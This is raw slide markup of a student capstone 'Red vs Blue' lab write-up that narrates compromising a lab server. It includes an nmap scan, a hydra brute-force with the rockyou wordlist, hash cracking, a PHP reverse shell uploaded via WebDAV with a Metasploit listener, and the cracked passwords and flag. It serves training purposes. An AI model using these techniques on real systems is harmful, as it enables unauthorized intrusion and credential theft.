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cb839f5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fcb839f5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fcb839f5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fcb839f5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fcb839f5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fcb839f5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fcb839f5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fcb839f5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fcb839f5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fcb839f5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rackstation.n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lavicle.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Red vs Blue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Reo T. and Nate</a:t>
            </a:r>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IP of Capstone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the command nmap -sSV -O 192.168.1.105. By doing this command we ended up finding out that it’s only running SSH and it was also using HTTP on the server. The port is linux.</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Going into the IP</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after finding out the IP we ended up going into a web browser with that IP of 192.168.1.105 and ended up finding 4 foldering that were named (company_blog, company_folders, company_share, meet_our_team) so what we ended up doing is going into all of them and ended up finding “company_folders/secret_folder” also in one of the folders we found out that “Ryan is the C.E.O, Hannah is V.P of I.T and Ashton is the direct communication, sales, customer privacy, and ex coffee delivery box”</a:t>
            </a:r>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Access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ended up being on “root@Kali:~#” and ended up using the command “locate rockyou.txt” it was in “/usr/share/wordlists/rockyou.txt.gz” so we went into that directory and ran “tar -zxvf rockyou.txt.gz” to get it in the directory the ran the command “gzip -d rockyou.txt.gz” so it would show in the directory as “rockyou.txt” we ended up going back the the home and going into the “Documents” folder and ran “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>” what that does is brute forcing it by using all of the passwords in the rockyou.txt dictionary. By running this command we end up finding out that Ashtons password was “leopoldo”</a:t>
            </a:r>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Gong into Ashton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ended up going back to the browser and we put in the search bar “192.168.1.105/company_folders/secret_folder” and used “ashton” as the user and used “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>leopoldo”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and gained access. When doing that we ended up finding a folder called “connect_to_corp_server” this was saying “in order to connect to our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>companies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> wedav server I need to use ryan’s account” then gave us a (Hash:d7dad0a5cd7c8376eeb50d69b3ccd352) we ended up going to “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://crackstation.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>” and cracked the hash and found the password was linux4u</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Engagement</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end looking up “dav://192.168.1.105/webdav” in the vm’s google and came across “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.clavicle.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>” which is a run down on how to get into the files we end up making a “shell.php” and putting it in the file and then ended up going into a terminal in ms5 and then putting “set LHOST 192.168.1.90” after that we “set LPORT 55555” and then once that was done then we ended up running that. We ended up going into a search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>engine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and put “192.168.1.105/webdav/shell.php” which ends up activating the command we ended up setting up. For us to find the Flag we end up running the command shell that gave us root then typed in “locate flag.txt” and ended up catting that and got bing0w@5h1sn@m0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent>
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="15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